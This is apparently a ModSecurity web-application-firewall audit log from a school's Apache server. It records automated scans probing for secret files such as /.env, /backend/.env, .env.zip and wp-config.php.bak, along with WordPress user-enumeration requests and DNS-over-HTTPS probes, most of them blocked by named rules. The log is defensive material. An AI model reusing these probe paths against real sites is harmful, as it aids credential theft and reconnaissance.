/wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 50.87.144.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 50.87.144.97 X-Forwarded-Proto: http Connection: close Accept: */* --7bc55336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bc55336-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746580647054864 886 (- - -) Stopwatch2: 1746580647054864 886; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bc55336-Z-- --6dcf2259-A-- [07/May/2025:11:19:27 +0700] aBrfT12wLCWKKTe5QCG0ugAAAEg 103.236.140.4 58884 103.236.140.4 8181 --6dcf2259-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.179.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.179.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6dcf2259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dcf2259-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746591567842459 815 (- - -) Stopwatch2: 1746591567842459 815; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dcf2259-Z-- --d956ae3b-A-- [07/May/2025:13:05:53 +0700] aBr4QV2wLCWKKTe5QCHAtwAAAEY 103.236.140.4 33654 103.236.140.4 8181 --d956ae3b-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d956ae3b-C-- ßÎexamplecom --d956ae3b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d956ae3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597953879176 4406 (- - -) Stopwatch2: 1746597953879176 4406; combined=2745, p1=571, p2=2062, p3=29, p4=35, p5=48, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d956ae3b-Z-- --d5650042-A-- [07/May/2025:13:05:55 +0700] aBr4Q12wLCWKKTe5QCHAugAAAFE 103.236.140.4 33672 103.236.140.4 8181 --d5650042-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d5650042-C-- zéexamplecom --d5650042-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5650042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597955017089 3388 (- - -) Stopwatch2: 1746597955017089 3388; combined=2147, p1=497, p2=1581, p3=21, p4=22, p5=25, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5650042-Z-- --2ae8447f-A-- [07/May/2025:13:05:55 +0700] aBr4Q12wLCWKKTe5QCHAvAAAAFI 103.236.140.4 33690 103.236.140.4 8181 --2ae8447f-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2ae8447f-C-- r£examplecom --2ae8447f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ae8447f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597955645818 4053 (- - -) Stopwatch2: 1746597955645818 4053; combined=2639, p1=577, p2=1974, p3=28, p4=33, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ae8447f-Z-- --20cd1d7d-A-- [07/May/2025:13:05:56 +0700] aBr4RIyiPdJj1JUH57p6BQAAABc 103.236.140.4 33704 103.236.140.4 8181 --20cd1d7d-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --20cd1d7d-C-- xyexamplecom --20cd1d7d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --20cd1d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597956282624 4062 (- - -) Stopwatch2: 1746597956282624 4062; combined=2512, p1=522, p2=1906, p3=27, p4=32, p5=25, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20cd1d7d-Z-- --2f6e0832-A-- [07/May/2025:13:05:56 +0700] aBr4RF2wLCWKKTe5QCHAvQAAAFQ 103.236.140.4 33718 103.236.140.4 8181 --2f6e0832-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2f6e0832-C-- ,±examplecom --2f6e0832-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f6e0832-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597956921486 3654 (- - -) Stopwatch2: 1746597956921486 3654; combined=2286, p1=526, p2=1682, p3=26, p4=30, p5=22, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f6e0832-Z-- --7f342577-A-- [07/May/2025:13:05:57 +0700] aBr4RV2wLCWKKTe5QCHAvwAAAFU 103.236.140.4 33732 103.236.140.4 8181 --7f342577-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --7f342577-C-- ¾ examplecom --7f342577-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f342577-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597957549425 4099 (- - -) Stopwatch2: 1746597957549425 4099; combined=2555, p1=515, p2=1949, p3=30, p4=34, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f342577-Z-- --4ddff959-A-- [07/May/2025:13:05:58 +0700] aBr4Rm3ZWOH0zu5xiSSZBAAAANM 103.236.140.4 33746 103.236.140.4 8181 --4ddff959-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --4ddff959-C-- öÞexamplecom --4ddff959-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --4ddff959-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597958176905 4574 (- - -) Stopwatch2: 1746597958176905 4574; combined=2707, p1=586, p2=2021, p3=37, p4=34, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ddff959-Z-- --2652b62f-A-- [07/May/2025:13:06:00 +0700] aBr4SEkjCPYF0_E6F_IngQAAAIk 103.236.140.4 33784 103.236.140.4 8181 --2652b62f-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --2652b62f-C-- ¶ÿexamplecom --2652b62f-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --2652b62f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746597960690438 4470 (- - -) Stopwatch2: 1746597960690438 4470; combined=2554, p1=524, p2=1926, p3=35, p4=35, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2652b62f-Z-- --0eaa6977-A-- [07/May/2025:13:25:40 +0700] aBr85EkjCPYF0_E6F_IqTQAAAIo 103.236.140.4 48774 103.236.140.4 8181 --0eaa6977-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.82.182.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.82.182.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eaa6977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eaa6977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746599140388023 3173 (- - -) Stopwatch2: 1746599140388023 3173; combined=1417, p1=520, p2=868, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eaa6977-Z-- --ec9ecf11-A-- [07/May/2025:14:40:54 +0700] aBsOhm3ZWOH0zu5xiSSfSAAAAMo 103.236.140.4 33396 103.236.140.4 8181 --ec9ecf11-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --ec9ecf11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec9ecf11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603654168875 1633 (- - -) Stopwatch2: 1746603654168875 1633; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec9ecf11-Z-- --050b4817-A-- [07/May/2025:14:41:02 +0700] aBsOjoyiPdJj1JUH57qDWQAAABU 103.236.140.4 33412 103.236.140.4 8181 --050b4817-B-- GET /backend/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C) --050b4817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --050b4817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603662702301 825 (- - -) Stopwatch2: 1746603662702301 825; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --050b4817-Z-- --19bcc849-A-- [07/May/2025:14:41:03 +0700] aBsOj4yiPdJj1JUH57qDWgAAAAI 103.236.140.4 33414 103.236.140.4 8181 --19bcc849-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3,gzip(gfe) --19bcc849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19bcc849-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603663703930 855 (- - -) Stopwatch2: 1746603663703930 855; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19bcc849-Z-- --766a3e42-A-- [07/May/2025:14:41:05 +0700] aBsOkW3ZWOH0zu5xiSSfSwAAANM 103.236.140.4 33416 103.236.140.4 8181 --766a3e42-B-- GET /admin/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN) --766a3e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --766a3e42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746603665900810 676 (- - -) Stopwatch2: 1746603665900810 676; combined=257, p1=221, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --766a3e42-Z-- --8fefbc24-A-- [07/May/2025:14:52:57 +0700] aBsRWW3ZWOH0zu5xiSSfdwAAANA 103.236.140.4 33762 103.236.140.4 8181 --8fefbc24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.164.223.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.164.223.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8fefbc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fefbc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746604377365060 2184 (- - -) Stopwatch2: 1746604377365060 2184; combined=1070, p1=367, p2=677, p3=0, p4=0, p5=26, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fefbc24-Z-- --a5e28164-A-- [07/May/2025:15:06:07 +0700] aBsUb23ZWOH0zu5xiSSfsAAAANg 103.236.140.4 34852 103.236.140.4 8181 --a5e28164-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932986 --a5e28164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a5e28164-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167662936 723 (- - -) Stopwatch2: 1746605167662936 723; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5e28164-Z-- --6da92b31-A-- [07/May/2025:15:06:07 +0700] aBsUb0kjCPYF0_E6F_ItswAAAJA 103.236.140.4 34944 103.236.140.4 8181 --6da92b31-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855485 --6da92b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6da92b31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167697735 775 (- - -) Stopwatch2: 1746605167697735 775; combined=271, p1=235, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6da92b31-Z-- --6d9c0501-A-- [07/May/2025:15:06:07 +0700] aBsUb23ZWOH0zu5xiSSfsQAAAMk 103.236.140.4 34948 103.236.140.4 8181 --6d9c0501-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932989 --6d9c0501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d9c0501-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 